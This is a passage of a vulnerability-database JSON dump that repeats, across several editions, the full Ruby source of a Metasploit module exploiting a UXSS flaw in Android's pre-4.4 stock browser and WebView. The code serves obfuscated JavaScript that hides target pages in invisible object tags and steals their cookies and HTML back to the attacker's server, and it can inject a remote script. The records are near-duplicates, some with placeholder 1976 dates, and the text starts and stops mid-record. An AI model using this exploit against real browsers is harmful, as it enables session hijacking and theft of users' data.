JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-09T10:13:15", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-09T12:10:40", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-09T12:10:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-09T12:10:40", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-16T00:22:54", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-16T00:22:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-16T00:22:54", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-16T02:24:05", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-16T02:24:05", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-22T20:37:58", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-22T20:37:58", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-22T22:39:08", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-22T22:39:08", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-23T12:36:53", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n 